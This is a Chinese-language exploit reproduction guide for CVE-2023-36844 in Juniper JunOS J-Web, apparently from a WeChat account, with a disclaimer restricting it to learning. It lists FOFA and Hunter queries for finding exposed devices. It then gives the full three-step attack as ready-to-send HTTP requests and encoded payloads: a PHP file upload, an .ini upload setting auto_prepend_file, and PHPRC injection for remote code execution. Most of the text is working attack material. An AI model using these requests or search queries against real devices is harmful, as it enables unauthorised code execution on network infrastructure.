0x01 免责声明
请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。
0x02 影响版本
Juniper JunOS SRX EX
0x03 网络测绘
fofa:
title:"Juniper Web Device Manager"
hunter:
web.title:"Juniper Web Device Manager"
0x04 漏洞复现
第一步
1. 首先准备一个payload,并且计算它的长度。
<?php phpinfo();?>
len:18
rs=do_upload&rsargs[0]=[{"fileData":"data:text/html;base64,PD9waHAgcGhwaW5mbygpOz8+","fileName":"test.php","csize":18}]
3. 将请求包进行URL编码。
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Atext%2Fhtml%3Bbase64%2CPD9waHAgcGhwaW5mbygpOz8%2B%22%2C%22fileName%22%3A%22test.php%22%2C%22csize%22%3A18%7D%5D
4. 发包请求,响应体中converted_fileName的值"*.php"需要提取出来,第二个POST请求需要用到。
POST /webauth_operation.php HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Atext%2Fhtml%3Bbase64%2CPD9waHAgcGhwaW5mbygpOz8%2B%22%2C%22fileName%22%3A%22test.php%22%2C%22csize%22%3A18%7D%5D
第二步
1. 将第一步响应体中converted_fileName的值"*.php"复制出来,然后构造payload,并且进行base64编码。
auto_prepend_file="/var/tmp/642bc02799e8e74b368bb685531d80ea63b71554425961cc0b201917a5d25e78.php"
YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg==
2. base64编码填入请求包。
rs=do_upload&rsargs[0]=[{"fileData":"data:plain/text;base64,YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg==","fileName":"test.ini","csize":97}]
3. 同样进行URL编码。
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Aplain%2Ftext%3Bbase64%2CYXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg%3D%3D%22%2C%22fileName%22%3A%22test.ini%22%2C%22csize%22%3A97%7D%5D
4. 发包请求,响应体中converted_fileName的值"*.ini"需要提取出来,第三步需要用到。
POST /webauth_operation.php HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
rs=do_upload&rsargs%5B0%5D=%5B%7B%22fileData%22%3A%22data%3Aplain%2Ftext%3Bbase64%2CYXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzY0MmJjMDI3OTllOGU3NGIzNjhiYjY4NTUzMWQ4MGVhNjNiNzE1NTQ0MjU5NjFjYzBiMjAxOTE3YTVkMjVlNzgucGhwIg%3D%3D%22%2C%22fileName%22%3A%22test.ini%22%2C%22csize%22%3A97%7D%5D
第三步
1. 将第二步响应体中converted_fileName的值"*.ini"进行拼接。
/webauth_operation.php?PHPRC=/var/tmp/03576ce5b74d4a2bd883e266baff2734fe7bd81e5b455440e01b0a4e9585344b.ini
0x05 下载地址
公众号回复【CVE-2023-36844】关键字获取